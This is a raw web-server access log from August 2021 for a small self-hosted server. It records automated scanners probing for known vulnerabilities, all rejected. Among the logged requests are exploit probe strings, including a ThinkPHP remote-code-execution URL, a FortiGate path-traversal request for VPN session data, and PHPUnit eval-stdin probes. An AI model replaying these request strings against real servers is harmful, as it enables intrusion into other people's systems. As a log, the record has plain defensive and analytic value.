(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Aug/2021:06:19:04 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Aug/2021:06:19:06 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Aug/2021:10:08:31 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.217.162] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [10/Aug/2021:10:08:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 74.120.14.54] [Length 0] [Gzip -] "-" "-" [10/Aug/2021:10:09:00 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.54] [Length 252] [Gzip -] "-" "-" [10/Aug/2021:10:09:00 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.54] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [10/Aug/2021:10:49:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.62] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "https://google.com" [10/Aug/2021:13:14:26 +0000] 400 - GET http localhost "/" [Client 147.182.223.92] [Length 252] [Gzip -] "-" "-" [10/Aug/2021:15:04:18 +0000] 400 - - http localhost "-" [Client 87.251.67.40] [Length 154] [Gzip -] "-" "-" [10/Aug/2021:15:07:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [10/Aug/2021:16:04:25 +0000] 444 - OPTIONS https 64.22.31.253 "/" [Client 34.79.240.178] [Length 0] [Gzip -] "-" "-" [10/Aug/2021:16:48:10 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.215.147] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [10/Aug/2021:17:00:16 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.215.131] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [10/Aug/2021:17:11:11 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.220.88] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [10/Aug/2021:17:12:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.35.168.32] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [10/Aug/2021:18:30:15 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.212.52] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [10/Aug/2021:20:52:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.90.160.122] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [10/Aug/2021:20:54:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [10/Aug/2021:20:54:41 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [10/Aug/2021:20:54:41 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [10/Aug/2021:20:54:41 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [10/Aug/2021:20:54:41 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [10/Aug/2021:20:54:41 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [10/Aug/2021:20:54:41 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [10/Aug/2021:20:55:21 +0000] 400 - - http localhost "-" [Client 61.219.11.151] [Length 154] [Gzip -] "-" "-" [10/Aug/2021:22:14:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.207.85] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [10/Aug/2021:22:24:06 +0000] 444 - GET https 64.22.31.253 "/ReportServer" [Client 192.241.213.99] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [10/Aug/2021:22:41:45 +0000] 444 - GET https 64.22.31.253 "/login" [Client 192.241.204.246] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [10/Aug/2021:23:01:27 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.220.209] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [11/Aug/2021:00:24:50 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [11/Aug/2021:01:36:08 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.32] [Length 0] [Gzip -] "-" "-" [11/Aug/2021:01:42:36 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Aug/2021:01:42:37 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Aug/2021:01:42:39 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Aug/2021:01:42:40 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Aug/2021:01:42:43 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [11/Aug/2021:01:42:43 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Aug/2021:01:42:44 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Aug/2021:01:42:46 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Aug/2021:01:42:46 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Aug/2021:01:42:48 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Aug/2021:01:42:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Aug/2021:05:31:48 +0000] 400 - GET http localhost "/" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [11/Aug/2021:05:40:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.61.146.242] [Length 0] [Gzip -] "httpx - Open-source project (github.com/projectdiscovery/httpx)" "-" [11/Aug/2021:06:27:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0" "-" [11/Aug/2021:08:27:13 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 199.19.224.165] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [11/Aug/2021:09:49:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [11/Aug/2021:10:09:21 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.220.201] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [11/Aug/2021:12:23:24 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Aug/2021:12:23:25 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Aug/2021:12:23:28 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Aug/2021:12:23:29 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Aug/2021:12:23:30 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [11/Aug/2021:12:23:30 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Aug/2021:12:23:33 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Aug/2021:12:23:33 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Aug/2021:12:23:35 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Aug/2021:12:23:36 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Aug/2021:13:16:46 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [11/Aug/2021:13:16:46 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [11/Aug/2021:13:56:27 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 199.19.224.165] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [11/Aug/2021:14:26:02 +0000] 444 - GET https 64.22.31.253 "/owa/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [11/Aug/2021:15:00:55 +0000] 400 - - http localhost "-" [Client 142.93.156.173] [Length 154] [Gzip -] "-" "-" [11/Aug/2021:15:00:55 +0000] 400 - - http localhost "-" [Client 142.93.156.173] [Length 154] [Gzip -] "-" "-" [11/Aug/2021:15:00:56 +0000] 400 - GET http 192.168.204.111 "/3000D00E0000FFFF3F0031313744373731343634304537353046007A7A7A7A7A7A7A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000008047A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000" [Client 142.93.156.173] [Length 654] [Gzip -] "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" "-" [11/Aug/2021:15:00:56 +0000] 400 - POST http 192.168.204.159 "/" [Client 142.93.156.173] [Length 252] [Gzip -] "WinHttpClient" "-" [11/Aug/2021:15:00:56 +0000] 400 - - http localhost "-" [Client 142.93.156.173] [Length 154] [Gzip -] "-" "-" [11/Aug/2021:15:00:56 +0000] 400 - - http localhost "-" [Client 142.93.156.173] [Length 154] [Gzip -] "-" "-" [11/Aug/2021:15:13:52 +0000] 400 - - http localhost "-" [Client 128.199.70.176] [Length 154] [Gzip -] "-" "-" [11/Aug/2021:15:13:52 +0000] 400 - - http localhost "-" [Client 128.199.70.176] [Length 154] [Gzip -] "-" "-" [11/Aug/2021:15:13:53 +0000] 400 - GET http 192.168.204.111 "/3000D00E0000FFFF3F0031313744373731343634304537353046007A7A7A7A7A7A7A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000008047A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000" [Client 128.199.70.176] [Length 654] [Gzip -] "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" "-" [11/Aug/2021:15:13:54 +0000] 400 - POST http 192.168.204.159 "/" [Client 128.199.70.176] [Length 252] [Gzip -] "WinHttpClient" "-" [11/Aug/2021:15:13:55 +0000] 400 - - http localhost "-" [Client 128.199.70.176] [Length 154] [Gzip -] "-" "-" [11/Aug/2021:15:13:55 +0000] 400 - - http localhost "-" [Client 128.199.70.176] [Length 154] [Gzip -] "-" "-" [11/Aug/2021:16:21:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [11/Aug/2021:16:29:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.55] [Length 0] [Gzip -] "-" "-" [11/Aug/2021:16:29:11 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.55] [Length 252] [Gzip -] "-" "-" [11/Aug/2021:16:29:11 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.55] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [11/Aug/2021:16:29:51 +0000] 400 - - http localhost "-" [Client 188.166.109.218] [Length 154] [Gzip -] "-" "-" [11/Aug/2021:16:48:32 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.215.237] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [11/Aug/2021:17:00:42 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.218.40] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [11/Aug/2021:17:07:16 +0000] 400 - - http localhost "-" [Client 188.166.62.103] [Length 154] [Gzip -] "-" "-" [11/Aug/2021:17:11:53 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.216.147] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [11/Aug/2021:18:31:10 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.214.31] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [11/Aug/2021:18:36:20 +0000] 444 - GET https komga.moralanimal.net "/" [Client 198.204.234.253] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36" "http://www.google.com.hk" [11/Aug/2021:18:44:40 +0000] 400 - - http localhost "-" [Client 61.219.11.151] [Length 154] [Gzip -] "-" "-" [11/Aug/2021:18:55:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.90] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [11/Aug/2021:19:12:04 +0000] 444 - GET https 64.22.31.253 "/solr/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [11/Aug/2021:21:07:29 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [11/Aug/2021:21:07:29 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [11/Aug/2021:21:07:29 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [11/Aug/2021:21:07:29 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [11/Aug/2021:21:07:29 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [11/Aug/2021:21:07:29 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [11/Aug/2021:22:13:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.216.130] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [11/Aug/2021:23:00:54 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.217.133] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Aug/2021:00:46:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 164.52.24.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" "-" [12/Aug/2021:00:46:59 +0000] 400 - - https localhost "-" [Client 164.52.24.162] [Length 154] [Gzip -] "-" "-" [12/Aug/2021:00:53:53 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Aug/2021:00:53:54 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Aug/2021:01:04:52 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Aug/2021:01:04:52 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Aug/2021:04:51:33 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.2] [Length 0] [Gzip -] "-" "-" [12/Aug/2021:05:51:46 +0000] 444 - GET https 64.22.31.253 "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" [Client 45.143.200.54] [Length 0] [Gzip -] "Python-urllib/3.7" "-" [12/Aug/2021:05:53:55 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [12/Aug/2021:06:06:11 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Aug/2021:06:06:11 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [12/Aug/2021:07:03:18 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Aug/2021:07:03:18 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Aug/2021:07:03:22 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Aug/2021:07:03:22 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Aug/2021:07:03:23 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Aug/2021:07:03:24 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Aug/2021:07:03:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Aug/2021:07:03:28 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Aug/2021:07:03:29 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Aug/2021:07:03:34 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Aug/2021:07:03:34 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [12/Aug/2021:09:01:27 +0000] 400 - GET https localhost "/7pbS" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [12/Aug/2021:10:11:10 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.215.17] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Aug/2021:11:57:05 +0000] 444 - GET https whoami.moralanimal.net "/" [Client 124.126.78.189] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10.0; VIVO find 816.012) 